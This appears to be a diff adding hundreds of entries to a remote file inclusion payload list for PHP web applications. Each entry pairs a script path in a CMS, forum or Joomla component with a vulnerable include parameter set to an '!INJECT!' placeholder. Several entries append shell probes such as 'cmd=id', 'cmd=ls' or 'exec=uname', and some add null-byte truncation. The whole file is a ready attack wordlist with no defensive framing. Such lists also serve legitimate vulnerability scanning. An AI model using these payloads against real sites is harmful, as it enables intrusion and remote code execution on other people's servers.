+/ScriptPath/index.php?page=!INJECT!
+/Script_Path/config.inc.php?_path=!INJECT!?
+/Scripts/app_and_readme/navigator/index.php?page=!INJECT!
+/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=!INJECT!
+/Somery/team.php?checkauth=!INJECT!
+/Upload/install.php?skindir=!INJECT!
+/Widgets/Base/Footer.php?sys_dir=!INJECT!
+/Widgets/Base/widget.BifContainer.php?sys_dir=!INJECT!
+/Widgets/Base/widget.BifRoot.php?sys_dir=!INJECT!
+/Widgets/Base/widget.BifRoot2.php?sys_dir=!INJECT!
+/Widgets/Base/widget.BifRoot3.php?sys_dir=!INJECT!
+/Widgets/Base/widget.BifWarning.php?sys_dir=!INJECT!
+/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=!INJECT!?
+/[path]/mybic_server.php?file=!INJECT!
+/[path]/previewtheme.php?theme=1&inc_path=!INJECT!?cmd
+/_administration/securite.php?cfg[document_uri]=!INJECT!
+/_blogadata/include/struct_admin.php?incl_page=!INJECT!?
+/_conf/_php-core/common-tpl-vars.php?admindir=!INJECT!
+/_connect.php?root=!INJECT!
+/_friendly/core/data/_load.php?friendly_path=!INJECT!
+/_friendly/core/data/yaml.inc.php?friendly_path=!INJECT!
+/_friendly/core/display/_load.php?friendly_path=!INJECT!
+/_friendly/core/support/_load.php?friendly_path=!INJECT!
+/_functions.php?prefix=!INJECT!
+/_includes/settings.inc.php?approot=!INJECT!
+/_theme/breadcrumb.php?rootBase=!INJECT!
+/_wk/wk_lang.php?WK[wkPath]=!INJECT!
+/abf_js.php?abs_pfad=!INJECT!?&cmd=id
+/about.php?CONFIG[MWCHAT_Libs]=!INJECT!?
+/about.php?bibtexrootrel=!INJECT!?
+/aboutinfo.php?bibtexrootrel=!INJECT!?
+/acc.php?page=!INJECT!
+/access/login.php?path_to_root=!INJECT!
+/account.php?insPath=!INJECT!
+/accsess/login.php?path_to_root=!INJECT!
+/active/components/xmlrpc/client.php?c[components]=!INJECT!
+/ad_main.php?_mygamefile=!INJECT!
+/add.cgi.php?blog_theme=!INJECT!
+/add_link.php?blog_theme=!INJECT!
+/addpost_newpoll.php?addpoll=preview&thispath=!INJECT!
+/addressbook.php?GLOBALS[basedir]=!INJECT!?
+/addsite.php?returnpath=!INJECT!
+/addvip.php?msetstr["PROGSDIR"]=!INJECT!
+/adm/krgourl.php?DOCUMENT_ROOT=!INJECT!?
+/adm/my_statistics.php?DOCUMENT_ROOT=!INJECT!?
+/admin.loudmouth.php?mainframe=!INJECT!
+/admin.php?Madoa=!INJECT!?
+/admin.php?cal_dir=!INJECT!
+/admin.php?env_dir=!INJECT!
+/admin.php?lang=!INJECT!
+/admin.php?page[path]=!INJECT!?&cmd=ls
+/admin.php?submit=submit&form_include_template=!INJECT!
+/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
+/admin/ST_countries.php?include_path=!INJECT!?
+/admin/ST_platforms.php?include_path=!INJECT!?
+/admin/addentry.php?phpbb_root_path=!INJECT!?
+/admin/addons/archive/archive.php?adminfolder=!INJECT!
+/admin/admin.php?path=!INJECT!
+/admin/admin.php?site_url=!INJECT!
+/admin/admin_forgotten_password.php?root_folder_path=!INJECT!
+/admin/admin_news_bot.php?root_path=!INJECT!?
+/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=!INJECT!
+/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=!INJECT!
+/admin/admin_users.php?phpbb_root_path=!INJECT!
+/admin/auth.php?xcart_dir=!INJECT!?
+/admin/auth/secure.php?cfgProgDir=!INJECT!?
+/admin/autoprompter.php?CONFIG[BASE_PATH]=!INJECT!
+/admin/bin/patch.php?INSTALL_FOLDER=!INJECT!
+/admin/catagory.php?language=!INJECT!
+/admin/classes/pear/OLE/PPS.php?homedir=!INJECT!
+/admin/classes/pear/OLE/PPS/File.php?homedir=!INJECT!
+/admin/classes/pear/OLE/PPS/Root.php?homedir=!INJECT!
+/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=!INJECT!
+/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=!INJECT!
+/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=!INJECT!
+/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=!INJECT!
+/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=!INJECT!
+/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=!INJECT!
+/admin/code/index.php?load_page=!INJECT!
+/admin/comment.php?config[installdir]=!INJECT!
+/admin/common-menu.php?CONF[local_path]=!INJECT!
+/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=!INJECT!?
+/admin/config_settings.tpl.php?include_path=!INJECT!?&cmd=id
+/admin/directory.php?config[installdir]=!INJECT!
+/admin/doeditconfig.php?thispath=../includes&config[path]=!INJECT!
+/admin/frontpage_right.php?loadadminpage=!INJECT!
+/admin/header.php?loc=!INJECT!
+/admin/inc/add.php?format_menue=!INJECT!
+/admin/inc/change_action.php?format_menue=!INJECT!
+/admin/include/common.php?commonIncludePath=!INJECT!?
+/admin/include/header.php?repertoire=!INJECT!?
+/admin/include/lib.module.php?mod_root=!INJECT!
+/admin/includes/admin_header.php?level=!INJECT!?
+/admin/includes/author_panel_header.php?level=!INJECT!?
+/admin/includes/header.php?bypass_installed=1&secure_page_path=!INJECT!%00
+/admin/includes/spaw/spaw_control.class.php?spaw_root=!INJECT!?
+/admin/index.php?path_to_script=!INJECT!?&cmd=ls
+/admin/index.php?pg=!INJECT!?
+/admin/index.php?xtrphome=!INJECT!
+/admin/index_sitios.php?_VIEW=!INJECT!
+/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=!INJECT!
+/admin/login.php?absolute_path=!INJECT!
+/admin/news.admin.php?path_to_script=!INJECT!?&cmd=ls
+/admin/news.php?language=!INJECT!
+/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=!INJECT!
+/admin/sendmsg.php?config[installdir]=!INJECT!
+/admin/setup/level2.php?dir=!INJECT!
+/admin/system/config/conf-activation.php?site_path=!INJECT!
+/admin/system/include.php?skindir=!INJECT!
+/admin/system/include.php?start=1&skindir=!INJECT!
+/admin/system/menu/item.php?site_path=!INJECT!
+/admin/system/modules/conf_modules.php?site_path=!INJECT!
+/admin/templates/template_thumbnail.php?thumb_template=!INJECT!
+/admin/testing/tests/0004_init_urls.php?init_path=!INJECT!?&
+/admin/themes.php?config[installdir]=!INJECT!
+/admin/tools/utf8conversion/index.php?path=!INJECT!?
+/admin/user_user.php?language=!INJECT!
+/admincp/auth/checklogin.php?cfgProgDir=!INJECT!
+/admincp/auth/secure.php?cfgProgDir=!INJECT!
+/adminhead.php?path[docroot]=!INJECT!
+/admini/admin.php?INC=!INJECT!?
+/admini/index.php?INC=!INJECT!?
+/administrator/admin.php?site_absolute_path=!INJECT!?
+/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
+/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
+/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
+/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
+/administrator/components/com_color/admin.color.php?mosConfig_live_site=!INJECT!?
+/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
+/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
+/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=!INJECT!?
+/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
+/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=!INJECT!
+/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
+/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=!INJECT!
+/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=!INJECT!
+/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_jreactions/langset.php?comPath=!INJECT!?
+/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=!INJECT!?
+/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=!INJECT!
+/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=!INJECT!
+/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=!INJECT!?
+/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=!INJECT!
+/administrator/components/com_webring/admin.webring.docs.php?component_dir=!INJECT!?
+/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=!INJECT!
+/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=!INJECT!
+/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=!INJECT!?
+/administrator/menu_add.php?site_absolute_path=!INJECT!?
+/administrator/menu_operation.php?site_absolute_path=!INJECT!?
+/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=!INJECT!
+/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=!INJECT!?
+/adodb/adodb-errorpear.inc.php?ourlinux_root_path=!INJECT!
+/adodb/adodb-pear.inc.php?ourlinux_root_path=!INJECT!
+/adodb/adodb.inc.php?path=!INJECT!
+/advanced_comment_system/admin.php?ACS_path=!INJECT!?
+/advanced_comment_system/index.php?ACS_path=!INJECT!?
+/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=!INJECT!?
+/agenda.php3?rootagenda=!INJECT!
+/agenda2.php3?rootagenda=!INJECT!
+/aides/index.php?page=!INJECT!?
+/ains_main.php?ains_path=!INJECT!
+/ajax/loadsplash.php?full_path=!INJECT!
+/ajouter.php?include=!INJECT!?
+/akarru.gui/main_content.php?bm_content=!INJECT!
+/akocomments.php?mosConfig_absolute_path=!INJECT!
+/amazon/cart.php?cmd=add&asin=!INJECT!
+/amazon/index.php?lang=!INJECT!
+/amazon/info.php?asin=!INJECT!
+/annonce.php?page=!INJECT!?&cmd=id
+/announcements.php?phpraid_dir=!INJECT!
+/anzagien.php?config[root_ordner]=!INJECT!?cmd=id
+/apbn/templates/head.php?APB_SETTINGS[template_path]=!INJECT!
+/api.php?t_path_core=!INJECT!?&cmd=id
+/apps/apps.php?app=!INJECT!
+/appserv/main.php?appserv_root=!INJECT!
+/arab3upload/customize.php?path=!INJECT!?&cmd=pwd
+/arab3upload/initialize.php?path=!INJECT!?&cmd=pwd
+/arash_lib/class/arash_gadmin.class.php?arashlib_dir=!INJECT!
+/arash_lib/class/arash_sadmin.class.php?arashlib_dir=!INJECT!
+/arash_lib/include/edit.inc.php?arashlib_dir=!INJECT!
+/arash_lib/include/list_features.inc.php?arashlib_dir=!INJECT!
+/archive.php?scriptpath=!INJECT!?
+/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=!INJECT!%00
+/artlist.php?root_path=!INJECT!
+/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=!INJECT!?cmd
+/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
+/athena.php?athena_dir=!INJECT!
+/auction/auction_common.php?phpbb_root_path=!INJECT!
+/auction/includes/converter.inc.php?include_path=!INJECT!?
+/auction/includes/messages.inc.php?include_path=!INJECT!?
+/auction/includes/settings.inc.php?include_path=!INJECT!?
+/auction/phpAdsNew/view.inc.php?phpAds_path=!INJECT!
+/auth.cookie.inc.php?da_path=!INJECT!
+/auth.header.inc.php?da_path=!INJECT!
+/auth.sessions.inc.php?da_path=!INJECT!
+/auth/auth.php?phpbb_root_path=!INJECT!
+/auth/auth_phpbb/phpbb_root_path=!INJECT!
+/authenticate.php?default_path_for_themes=!INJECT!?
+/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=!INJECT!
+/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=!INJECT!
+/auto_check_renewals.php?installed_config_file=!INJECT!?cmd=ls
+/autoindex.php?cfg_file=!INJECT!?
+/awzmb/adminhelp.php?Setting[OPT_includepath]=!INJECT!
+/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=!INJECT!
+/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=!INJECT!
+/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=!INJECT!
+/awzmb/modules/help.incl.php?Setting[OPT_includepath]=!INJECT!
+/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=!INJECT!
+/axoverzicht.cgi?maand=!INJECT!
+/b2-tools/gm-2-b2.php?b2inc=!INJECT!
+/b2verifauth.php?index=!INJECT!?
+/backend/addons/links/index.php?PATH=!INJECT!
+/basebuilder/src/main.inc.php?mj_config[src_path]=!INJECT!???
+/bb_admin.php?includeFooter=!INJECT!
+/beacon/language/1/splash.lang.php?languagePath=!INJECT!
+/beacon/language/1/splash.lang.php?languagePath=!INJECT!?
+/belegungsplan/jahresuebersicht.inc.php?root=!INJECT!
+/belegungsplan/monatsuebersicht.inc.php?root=!INJECT!
+/belegungsplan/tagesuebersicht.inc.php?root=!INJECT!
+/belegungsplan/wochenuebersicht.inc.php?root=!INJECT!
+/bemarket/postscript/postscript.php?p_mode=!INJECT!
+/biblioteca/bib_form.php?CLASSPATH=!INJECT!
+/biblioteca/bib_pldetails.php?CLASSPATH=!INJECT!
+/biblioteca/bib_plform.php?CLASSPATH=!INJECT!
+/biblioteca/bib_plsearchc.php?CLASSPATH=!INJECT!
+/biblioteca/bib_plsearchs.php?CLASSPATH=!INJECT!
+/biblioteca/bib_save.php?CLASSPATH=!INJECT!
+/biblioteca/bib_searchc.php?CLASSPATH=!INJECT!
+/biblioteca/bib_searchs.php?CLASSPATH=!INJECT!
+/biblioteca/edi_form.php?CLASSPATH=!INJECT!
+/biblioteca/edi_save.php?CLASSPATH=!INJECT!
+/biblioteca/gen_form.php?CLASSPATH=!INJECT!
+/biblioteca/gen_save.php?CLASSPATH=!INJECT!
+/biblioteca/lin_form.php?CLASSPATH=!INJECT!
+/biblioteca/lin_save.php?CLASSPATH=!INJECT!
+/biblioteca/luo_form.php?CLASSPATH=!INJECT!
+/biblioteca/luo_save.php?CLASSPATH=!INJECT!
+/biblioteca/sog_form.php?CLASSPATH=!INJECT!
+/biblioteca/sog_save.php?CLASSPATH=!INJECT!
+/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!
+/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
+/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
+/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=!INJECT!?
+/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=!INJECT!?
+/bild.php?config[root_ordner]=!INJECT!?&cmd=id
+/bin/qte_init.php?qte_root=!INJECT!?
+/bingoserver.php3?response_dir=!INJECT!
+/block.php?Include=!INJECT!
+/blocks/birthday.php?full_path=!INJECT!
+/blocks/events.php?full_path=!INJECT!
+/blocks/help.php?full_path=!INJECT!
+/blogcms/admin/media.php?DIR_LIBS=!INJECT!?
+/blogcms/admin/xmlrpc/server.php?DIR_LIBS=!INJECT!?
+/blogcms/index.php?DIR_PLUGINS=!INJECT!?
+/board/post.php?qb_path=!INJECT!
+/boitenews4/index.php?url_index=!INJECT!?
+/books/allbooks.php?home=!INJECT!
+/books/home.php?home=!INJECT!
+/books/mybooks.php?home=!INJECT!
+/bp_ncom.php?bnrep=!INJECT!
+/bp_ncom.php?bnrep=!INJECT!?
+/bp_news.php?bnrep=!INJECT!
+/bridge/enigma/E2_header.inc.php?boarddir=!INJECT!?
+/bridge/yabbse.inc.php?sourcedir=!INJECT!
+/bridges/SMF/logout.php?path_to_smf=!INJECT!
+/bu/bu_cache.php?bu_dir=!INJECT!?
+/bu/bu_claro.php?bu_dir=!INJECT!?
+/bu/bu_parse.php?bu_dir=!INJECT!?
+/bu/process.php?bu_dir=!INJECT!?
+/buddy.php?CONFIG[MWCHAT_Libs]=!INJECT!?
+/builddb.php?env_dir=!INJECT!
+/button/settings_sql.php?path=!INJECT!
+/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=!INJECT!?
+/cal.func.php?dir_edge_lang=!INJECT!
+/calcul-page.php?home=!INJECT!
+/calendar.php?cfg_dir=!INJECT!?
+/calendar.php?lang=!INJECT!
+/calendar.php?path_to_calendar=!INJECT!
+/calendar.php?vwar_root=!INJECT!?
+/calendar/demo/index.php?date=&v=!INJECT!?
+/calendar/payment.php?insPath=!INJECT!
+/calendario/cal_insert.php?CLASSPATH=!INJECT!
+/calendario/cal_save.php?CLASSPATH=!INJECT!
+/calendario/cal_saveactivity.php?CLASSPATH=!INJECT!
+/cart.php?lang_list=!INJECT!
+/cart_content.php?cart_isp_root=!INJECT!
+/catalogg/inludes/include_once.php?include_file=!INJECT!
+/catalogshop.php?mosConfig_absolute_path=!INJECT!
+/cdsagenda/modification/SendAlertEmail.php?AGE=!INJECT!?
+/cfagcms/themes/default/index.php?main=!INJECT!
+/ch_readalso.php?read_xml_include=!INJECT!
+/challenge.php?vwar_root=!INJECT!
+/change_preferences2.php?target=!INJECT!?
+/chat.php?CONFIG[MWCHAT_Libs]=!INJECT!?
+/chat.php?my[root]=!INJECT!?cm=id
+/chat/adminips.php?banned_file=!INJECT!
+/chat/users_popupL.php3?From=!INJECT!
+/checkout.php?abs_path=!INJECT!
+/checkout.php?abs_path=!INJECT!?
+/ciamos_path/modules/forum/include/config.php?module_cache_path='!INJECT!'
+/circ.php?include_path=!INJECT!?
+/circolari/cir_save.php?CLASSPATH=!INJECT!
+/citywriter/head.php?path=!INJECT!?
+/cl_files/index.php?path_to_calendar=!INJECT!?
+/claroline/auth/ldap/authldap.php?includePath=!INJECT!
+/claroline/phpbb/page_tail.php?includePath=!INJECT!
+/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=!INJECT!?
+/class.mysql.php?path_to_bt_dir=!INJECT!
+/class/Wiki/Wiki.php?c_node[class_path]=!INJECT!
+/class/jpcache/jpcache.php?_PSL[classdir]=!INJECT!?exec=uname
+/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
+/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=!INJECT!
+/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=!INJECT!
+/classes/Cache.class.php?rootdir=!INJECT!?
+/classes/Customer.class.php?rootdir=!INJECT!?
+/classes/Performance.class.php?rootdir=!INJECT!?
+/classes/Project.class.php?rootdir=!INJECT!?
+/classes/Representative.class.php?rootdir=!INJECT!?
+/classes/User.class.php?rootdir=!INJECT!?
+/classes/admin_o.php?absolutepath=!INJECT!
+/classes/adodbt/sql.php?classes_dir=!INJECT!
+/classes/adodbt/sql.php?classes_dir=!INJECT!?
+/classes/board_o.php?absolutepath=!INJECT!
+/classes/class_admin.php?PathToComment=!INJECT!?
+/classes/class_comments.php?PathToComment=!INJECT!?
+/classes/class_mail.inc.php?path_to_folder=!INJECT!
+/classes/common.php?rootdir=!INJECT!?
+/classes/core/language.php?rootdir=!INJECT!
+/classes/dev_o.php?absolutepath=!INJECT!
+/classes/file_o.php?absolutepath=!INJECT!
+/classes/html/com_articles.php?absolute_path=!INJECT!
+/classes/phpmailer/class.cs_phpmailer.php?classes_dir=!INJECT!
+/classes/query.class.php?baseDir=!INJECT!
+/classes/tech_o.php?absolutepath=!INJECT!
+/classified.php?insPath=!INJECT!
+/classified_right.php?language_dir=!INJECT!
+/classifieds/index.php?lowerTemplate=!INJECT!
+/clear.php?bibtexrootrel=!INJECT!?
+/clearinfo.php?bibtexrootrel=!INJECT!?
+/click.php?dir=!INJECT!?
+/client.php?dir=!INJECT!
+/client/faq_1/PageController.php?dir=!INJECT!
+/clients/index.php?src=!INJECT!
+/cls_fast_template.php?fname=!INJECT!
+/cm68news/engine/oldnews.inc.php?addpath=!INJECT!?&
+/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=!INJECT!?
+/cms/meetweb/classes/ManagerResource.class.php?root_path=!INJECT!
+/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=!INJECT!
+/cms/meetweb/classes/RegForm.class.php?root_path=!INJECT!
+/cms/meetweb/classes/RegResource.class.php?root_path=!INJECT!
+/cms/meetweb/classes/RegRightsResource.class.php?root_path=!INJECT!
+/cms/meetweb/classes/modules.php?root_path=!INJECT!
+/cms/modules/form.lib.php?sourceFolder=!INJECT!?
+/cms/system/openengine.php?oe_classpath=!INJECT!???
+/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=!INJECT!?
+/cn_config.php?tpath=!INJECT!?
+/coast/header.php?sections_file=!INJECT!?
+/code/berylium-classes.php?beryliumroot=!INJECT!?
+/code/display.php?admindir=!INJECT!?
+/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=!INJECT!
+/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
+/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=!INJECT!?
+/com_media_library/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
+/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
+/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
+/comments.php?AMG_serverpath=!INJECT!
+/comments.php?scriptpath=!INJECT!?
+/common.inc.php?CFG[libdir]=!INJECT!
+/common.inc.php?CFG[libdir]=!INJECT!?
+/common.inc.php?base_path=!INJECT!
+/common.php?db_file=!INJECT!
+/common.php?dir=!INJECT!
+/common.php?ezt_root_path=!INJECT!?
+/common.php?include_path=!INJECT!
+/common.php?livealbum_dir=!INJECT!?
+/common.php?locale=!INJECT!
+/common.php?phpht_real_path=!INJECT!?
+/common/db.php?commonpath=!INJECT!?
+/common/func.php?CommonAbsD=!INJECT!?
+/common/func.php?CommonAbsDir=!INJECT!
+/community/Offline.php?sourcedir=!INJECT!?
+/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=!INJECT!
+/components/calendar/com_calendar.php?absolute_path=!INJECT!?
+/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
+/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=!INJECT!
+/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=!INJECT!
+/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=!INJECT!
+/components/com_articles.php?absolute_path=!INJECT!?
+/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=!INJECT!
+/components/com_calendar.php?absolute_path=!INJECT!?
+/components/com_cpg/cpg.php?mosConfig_absolute_path=!INJECT!?
+/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=!INJECT!
+/components/com_facileforms/facileforms.frame.php?ff_compath=!INJECT!
+/components/com_forum/download.php?phpbb_root_path=!INJECT!
+/components/com_galleria/galleria.html.php?mosConfig_absolute_path=!INJECT!
+/components/com_guestbook.php?absolute_path=!INJECT!?
+/components/com_hashcash/server.php?mosConfig_absolute_path=!INJECT!?
+/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=!INJECT!
+/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=!INJECT!
+/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=!INJECT!
+/components/com_joomlaboard/file_upload.php?sbp=!INJECT!?
+/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=!INJECT!?
+/components/com_lm/archive.php?mosConfig_absolute_path=!INJECT!?
+/components/com_mambowiki/MamboLogin.php?IP=!INJECT!?
